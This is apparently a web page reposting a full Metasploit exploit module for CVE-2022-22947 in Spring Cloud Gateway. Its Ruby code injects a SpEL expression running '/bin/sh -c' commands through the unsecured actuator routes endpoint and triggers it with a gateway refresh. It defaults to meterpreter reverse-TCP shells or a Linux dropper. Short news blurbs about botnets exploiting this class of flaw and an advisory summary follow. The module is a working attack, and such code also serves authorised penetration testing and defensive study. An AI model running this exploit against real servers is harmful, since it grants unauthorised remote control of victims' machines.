Headline
Spring Cloud Gateway 3.1.0 Remote Code Execution
This Metasploit module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway versions 3.0.0 through 3.0.6 and 3.1.0. The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL expressions to execute code and take control of the victim machine.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Spring Cloud Gateway Remote Code Execution', 'Description' => %q{ This module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway versions = 3.1.0 and 3.0.0 to 3.0.6. The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL expressions to execute code and take control of the victim machine. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ayan Saha' ], 'References' => [ ['CVE', '2022-22947' ], ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'], ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/'], ['URL', 'https://tanzu.vmware.com/security/cve-2022-22947'], ['URL', 'https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published'] ], 'Platform' => 'linux', 'Arch' => [ARCH_X64, ARCH_CMD], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp', 'RPORT' => 9000 } } ], [ 'Linux (Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, 'Type' => :linux_dropper } ], ], 'DisclosureDate' => '2022-01-26', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ] } ) ) end def run_command(cmd) route_name = Rex::Text.rand_text_alpha(8).downcase uri = "/actuator/gateway/routes/#{route_name}" value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c", "' + cmd + '"}).getInputStream()))}' data = { 'id' => route_name, 'filters' => [ { 'name' => 'AddResponseHeader', 'args' => { 'name' => 'Result', 'value' => value } } ], 'uri' => "http://#{Rex::Text.rand_text_alphanumeric(6..15)}.com" } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri), 'ctype' => 'application/json', 'data' => JSON.generate(data) }) if res && res.code == 201 && res.message == 'Created' return route_name else return nil end end ## Takes in the command and creates a new route with it on the server def execute_command(cmd, _opts = {}) route_name = run_command(cmd) if route_name refresh cleanup_route(route_name) else return false end return true end ## Cleaning up the routes created def cleanup_route(route_name) uri = "/actuator/gateway/routes/#{route_name}" res = send_request_cgi({ 'method' => 'DELETE', 'uri' => normalize_uri(uri) }) if res && res.code == 200 print_good('Route deleted') return true else print_error("Couldn't delete route. Might require manual cleanup.") return false end end def check print_status('Checking if server is vulnerable') res = execute_command('whoami') if res return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end ## Refresh the gateway to trigger the routes with commands created def refresh print_status('Triggering code execution using routes') uri = '/actuator/gateway/refresh' send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri) }) end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end endend
Related news
Spring4Shell and Veeam RCE exploit topped the list in Q1 2022
EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.
Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.
A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS). "The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services
The Sysrv botnet has been developing over the last years, and has become a multi-platform botnet that specializes in Monero cryptomining. The post Sysrv botnet is out to mine Monero on your Windows and Linux servers appeared first on Malwarebytes Labs.
By Deeba Ahmed Microsoft has discovered a new Sysrv botnet variant deploying cryptocurrency miners on Windows and Linux systems. The Microsoft… This is a post from HackRead.com Read the original post: New Sysrv-k Botnet Infecting Windows and Linux Systems with Cryptominer
Microsoft researchers say they are tracking a botnet that is leveraging bugs in the Spring Framework and WordPress plugins.
Microsoft is warning of a new variant of the srv botnet that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems. The tech giant, which has called the new version Sysrv-K, is said to weaponize an array of exploits to gain control of web servers. The cryptojacking botnet first emerged in December 2020. "Sysrv-K scans the
Image source: z3r00t The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. Tracked as CVE-2022-30525, the vulnerability is rated 9.8 for severity and relates to a command injection flaw
In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.